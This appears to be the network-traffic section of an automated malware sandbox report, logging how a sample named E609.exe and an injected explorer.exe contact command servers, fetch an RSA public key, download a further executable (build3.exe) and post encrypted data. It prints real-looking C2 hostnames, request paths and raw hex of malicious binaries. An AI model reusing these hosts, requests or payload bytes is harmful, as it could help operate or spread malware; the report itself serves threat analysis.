                                                                                              May 25, 2024 21:29:42.494750977 CEST224INData Raw: 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 14 27 40 00 8d 49 00 c8 26 40 00 d0 26 40 00 d8 26 40 00 e0 26 40 00 e8 26 40 00 f0 26 40 00 f8 26 40 00 0b 27 40 00 8b 44 8e 1c 89 44 8f 1c
                                                                                              Data Ascii: GFGV$'@I&@&@&@&@&@&@&@'@DDDDDDDDDDDDDD$'@$'@,'@<'@P'@D$^_FGD$^_IFGFGD$^_FGFGF
                                                                                              May 25, 2024 21:29:42.499389887 CEST1236INData Raw: 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 ea 07 74 65 8d a4 24 00 00 00 00 90 66 0f 6f 06 66 0f 6f 4e 10 66 0f 6f 56 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57
                                                                                              Data Ascii: GD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tvIutFGIuX^_$
                                                                                              May 25, 2024 21:29:42.499423981 CEST1236INData Raw: 40 00 60 2c 40 00 8b 44 24 0c 5e 5f c3 90 8a 06 88 07 8b 44 24 0c 5e 5f c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 44 24 0c 5e 5f c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00
                                                                                              Data Ascii: @`,@D$^_D$^_FGD$^_IFGFGD$^_t1|9u$r$-@$t-@Ir+$,@$-@,@,@$-@F#Gr$-@IF#GFGr$-@
                                                                                              May 25, 2024 21:29:42.499455929 CEST1236INData Raw: 5f c3 55 8b ec 83 7d 08 00 75 15 e8 1d 14 00 00 c7 00 16 00 00 00 e8 a3 13 00 00 83 c8 ff 5d c3 56 8b 75 0c 85 f6 75 16 e8 00 14 00 00 c7 00 16 00 00 00 e8 86 13 00 00 83 c8 ff 5e 5d c3 ff 75 08 e8 b5 14 00 00 89 06 23 c2 89 56 04 59 83 f8 ff 74
                                                                                              Data Ascii: _U}u]Vuu^]u#VYt3Vjj YYVx@0,ujX^&3^jh(LAeSeu#YuEu.UQSV5|@W505,EE;
                                                                                              May 25, 2024 21:29:42.508579969 CEST1236INData Raw: b4 08 00 00 59 6a 01 e8 e6 08 00 00 59 85 c0 74 07 50 e8 a1 08 00 00 59 e8 36 38 00 00 56 50 6a 00 68 00 00 40 00 e8 66 e1 ff ff 8b f0 89 75 dc 85 db 75 06 56 e8 21 0b 00 00 e8 a4 08 00 00 eb 2e 8b 4d ec 8b 01 8b 00 89 45 e0 51 50 e8 50 26 00 00
                                                                                              Data Ascii: YjYtPY68VPjh@fuuV!.MEQPP&YYeuu}uVeENU=h3CuC0u0hYY]2;eAu8U VWjYA}u}ttQpP }


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.449758213.172.74.157802764C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:43.452183008 CEST139OUTGET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                              User-Agent: Microsoft Internet Explorer
                                                                                              Host: cajgtus.com
                                                                                              May 25, 2024 21:29:44.401863098 CEST761INHTTP/1.1 200 OK
                                                                                              Date: Sat, 25 May 2024 19:29:57 GMT
                                                                                              Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                              X-Powered-By: PHP/5.6.40
                                                                                              Content-Length: 557
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 75 35 31 66 77 6e 51 79 38 55 75 2b 73 49 4a 6e 73 66 38 42 5c 5c 6e 66 53 69 7a 31 61 75 68 5a 74 4c 39 39 6a 48 62 75 64 32 37 79 42 32 34 78 54 58 6a 52 78 6e 46 5c 2f 71 55 44 6a 74 50 75 4d 7a 71 52 39 63 6e 6b 34 46 4d 34 62 44 37 33 77 51 52 72 64 52 46 68 5c 5c 6e 53 45 35 57 6b 31 31 76 74 6b 53 50 70 34 7a 43 4e 6e 58 37 69 4f 42 47 78 52 71 36 54 52 58 41 33 72 58 6c 4d 2b 50 75 6f 52 5a 4a 76 6f 53 6d 31 67 38 39 63 56 6e 6d 70 38 75 75 55 5a 67 4d 5c 5c 6e 30 45 74 6c 55 6b 62 48 57 4b 46 6b 72 33 4c 4e 47 5a 6c 33 33 68 55 6d 76 46 69 77 30 43 51 52 71 2b 54 34 44 49 7a 39 64 6e 4b 46 6f 53 43 4f 44 43 4f 41 59 4c 34 65 66 62 59 47 5a 69 6c 37 5c 5c 6e 63 33 5c 2f 48 7a 35 43 46 45 2b 66 65 56 54 [TRUNCATED]
                                                                                              Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.449757213.172.74.157805436C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:43.458281994 CEST128OUTGET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                              User-Agent: Microsoft Internet Explorer
                                                                                              Host: cajgtus.com
                                                                                              May 25, 2024 21:29:44.396945000 CEST761INHTTP/1.1 200 OK
                                                                                              Date: Sat, 25 May 2024 19:29:57 GMT
                                                                                              Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                              X-Powered-By: PHP/5.6.40
                                                                                              Content-Length: 557
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 75 35 31 66 77 6e 51 79 38 55 75 2b 73 49 4a 6e 73 66 38 42 5c 5c 6e 66 53 69 7a 31 61 75 68 5a 74 4c 39 39 6a 48 62 75 64 32 37 79 42 32 34 78 54 58 6a 52 78 6e 46 5c 2f 71 55 44 6a 74 50 75 4d 7a 71 52 39 63 6e 6b 34 46 4d 34 62 44 37 33 77 51 52 72 64 52 46 68 5c 5c 6e 53 45 35 57 6b 31 31 76 74 6b 53 50 70 34 7a 43 4e 6e 58 37 69 4f 42 47 78 52 71 36 54 52 58 41 33 72 58 6c 4d 2b 50 75 6f 52 5a 4a 76 6f 53 6d 31 67 38 39 63 56 6e 6d 70 38 75 75 55 5a 67 4d 5c 5c 6e 30 45 74 6c 55 6b 62 48 57 4b 46 6b 72 33 4c 4e 47 5a 6c 33 33 68 55 6d 76 46 69 77 30 43 51 52 71 2b 54 34 44 49 7a 39 64 6e 4b 46 6f 53 43 4f 44 43 4f 41 59 4c 34 65 66 62 59 47 5a 69 6c 37 5c 5c 6e 63 33 5c 2f 48 7a 35 43 46 45 2b 66 65 56 54 [TRUNCATED]
                                                                                              Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.449759158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:44.284933090 CEST285OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://mxmwgpprwcpwxem.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 136
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:44.284933090 CEST136OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 92 66 5d 02 c8 a1 c1 64 2e 81 b2 27
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d.'EoluRK^i)+rDw#Eg*PMF]d'nXZu
                                                                                              May 25, 2024 21:29:45.030427933 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:44 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.449760213.172.74.157802764C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:44.285365105 CEST96OUTGET /files/1/build3.exe HTTP/1.1
                                                                                              User-Agent: Microsoft Internet Explorer
                                                                                              Host: cajgtus.com
                                                                                              May 25, 2024 21:29:45.290709972 CEST1236INHTTP/1.1 200 OK
                                                                                              Date: Sat, 25 May 2024 19:29:58 GMT
                                                                                              Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                              Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT
                                                                                              ETag: "4ae00-6074de5a4a562"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 306688
                                                                                              Connection: close
                                                                                              Content-Type: application/x-msdownload
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 [TRUNCATED]
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6krh8rh8rh88sh8l8nh8l8h8U_8{h8ri8h8l82h8l8sh8l8sh8Richrh8PELaj; @>lhd>/0@.textrhj `.data:n@.kic>|@.rsrc/>0~@@
                                                                                              May 25, 2024 21:29:45.292639971 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 73 03 00 00 00 00 00 8c 73 03 00 9c 73 03 00
                                                                                              Data Ascii: ssskl"l.lHlZlpllllllllm m4mBm^mtmmmmmmmnn&n@n\nlnnnnnnnn
                                                                                              May 25, 2024 21:29:45.302105904 CEST448INData Raw: 61 00 66 00 61 00 63 00 61 00 00 00 00 00 6a 6f 78 65 63 65 00 00 73 75 76 75 73 75 6e 69 78 61 6e 6f 66 75 6c 6f 78 75 63 65 70 6f 66 61 6c 69 6d 65 74 6f 6d 69 6e 69 62 69 64 6f 00 00 6c 00 75 00 7a 00 6f 00 67 00 75 00 64 00 61 00 77 00 75 00
                                                                                              Data Ascii: afacajoxecesuvusunixanofuloxucepofalimetominibidoluzogudawulapabevotuwSolofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaM
                                                                                              May 25, 2024 21:29:45.446660042 CEST1236INData Raw: 32 00 2e 00 64 00 6c 00 6c 00 00 00 00 00 ec b8 40 00 a7 bb 40 00 d0 e7 40 00 49 00 54 00 45 00 52 00 41 00 54 00 4f 00 52 00 20 00 4c 00 49 00 53 00 54 00 20 00 43 00 4f 00 52 00 52 00 55 00 50 00 54 00 45 00 44 00 21 00 00 00 00 00 43 00 3a 00
                                                                                              Data Ascii: 2.dll@@@ITERATOR LIST CORRUPTED!C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\xutility"out of ran
                                                                                              May 25, 2024 21:29:45.448729038 CEST224INData Raw: 72 00 00 00 00 00 00 00 00 00 73 00 74 00 64 00 3a 00 3a 00 5f 00 56 00 65 00 63 00 74 00 6f 00 72 00 5f 00 63 00 6f 00 6e 00 73 00 74 00 5f 00 69 00 74 00 65 00 72 00 61 00 74 00 6f 00 72 00 3c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00
                                                                                              Data Ascii: rstd::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator
                                                                                              May 25, 2024 21:29:45.453568935 CEST1236INData Raw: 3c 00 63 00 68 00 61 00 72 00 3e 00 20 00 3e 00 2c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00
                                                                                              Data Ascii: <char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >:
                                                                                              May 25, 2024 21:29:45.453604937 CEST224INData Raw: 20 00 30 00 29 00 00 00 00 00 6c b9 40 00 ef d2 40 00 e7 d2 40 00 43 00 3a 00 5c 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00 69 00 6c 00 65 00 73 00 20 00 28 00 78 00 38 00 36 00 29 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00
                                                                                              Data Ascii: 0)l@@@C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\xstring@!@@vector<T> too longC:\Program Fi
                                                                                              May 25, 2024 21:29:45.458331108 CEST1236INData Raw: 6c 00 65 00 73 00 20 00 28 00 78 00 38 00 36 00 29 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 56 00 69 00 73 00 75 00 61 00 6c 00 20 00 53 00 74 00 75 00 64 00 69 00 6f 00 20 00 39 00 2e 00 30 00 5c 00 56 00 43 00 5c 00
                                                                                              Data Ascii: les (x86)\Microsoft Visual Studio 9.0\VC\include\memoryvector erase iterator outside rangevector insert iterator outs
                                                                                              May 25, 2024 21:29:45.458364010 CEST224INData Raw: 6e 00 67 00 20 00 74 00 6f 00 6f 00 20 00 6c 00 6f 00 6e 00 67 00 20 00 6f 00 72 00 20 00 49 00 4f 00 20 00 45 00 72 00 72 00 6f 00 72 00 00 00 00 00 77 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 4f 00 75 00 74 00 4d 00 65 00
                                                                                              Data Ascii: ng too long or IO Errorwcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")(*_errno())
                                                                                              May 25, 2024 21:29:45.500643969 CEST224INData Raw: 6e 00 67 00 20 00 74 00 6f 00 6f 00 20 00 6c 00 6f 00 6e 00 67 00 20 00 6f 00 72 00 20 00 49 00 4f 00 20 00 45 00 72 00 72 00 6f 00 72 00 00 00 00 00 77 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 4f 00 75 00 74 00 4d 00 65 00
                                                                                              Data Ascii: ng too long or IO Errorwcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")(*_errno())
                                                                                              May 25, 2024 21:29:45.603466034 CEST1236INData Raw: 00 00 44 00 65 00 62 00 75 00 67 00 20 00 25 00 73 00 21 00 0a 00 0a 00 50 00 72 00 6f 00 67 00 72 00 61 00 6d 00 3a 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00
                                                                                              Data Ascii: Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)Module: File: Line: Expre


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.449761158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:45.087893009 CEST283OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://bglvkirrchdcy.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 353
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:45.087918997 CEST353OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 93 66 5d 02 c8 a1 c1 64 23 c7 ad 7d
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d#}F}u7c)-#4jwFc0;F/>(q\+~JtA=kKO9Y@b$yEd:w~YmFC^?LN5^^:b+<%9
                                                                                              May 25, 2024 21:29:45.813000917 CEST262INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:45 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 4f73|"s2h3T'cSc"8iz`;?Dt0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.449763158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:45.888232946 CEST284OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://syppprqoaeoyrm.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 208
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:45.888266087 CEST208OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 93 66 5d 02 c9 a1 c1 64 26 9c ca 69
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d&i#~pJap_!45oD:G}!`1NLp"<6u_QY^mxKOU$@gs,j0y{]U]ANIj
                                                                                              May 25, 2024 21:29:46.608958960 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:46 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.449764158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:46.731628895 CEST282OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://syrimjyxlgxo.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 135
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:46.731661081 CEST135OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 90 66 5d 02 c8 a1 c1 64 15 d6 dd 00
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d\y0AGJLOP3wn&@-`*?a}O:
                                                                                              May 25, 2024 21:29:47.462054014 CEST156INHTTP/1.1 200 OK
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:47 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Content-Length: 0
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.449766158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:29:47.693104982 CEST285OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://doewnlgtcbtsgiu.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 162
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:29:47.693207979 CEST162OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 91 66 5d 02 c8 a1 c1 64 43 a0 c9 76
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]dCv4welg-^#5@<n}S53i.$r4jLEa|\E#A@B<Q]_l
                                                                                              May 25, 2024 21:29:48.414397955 CEST597INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:29:48 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
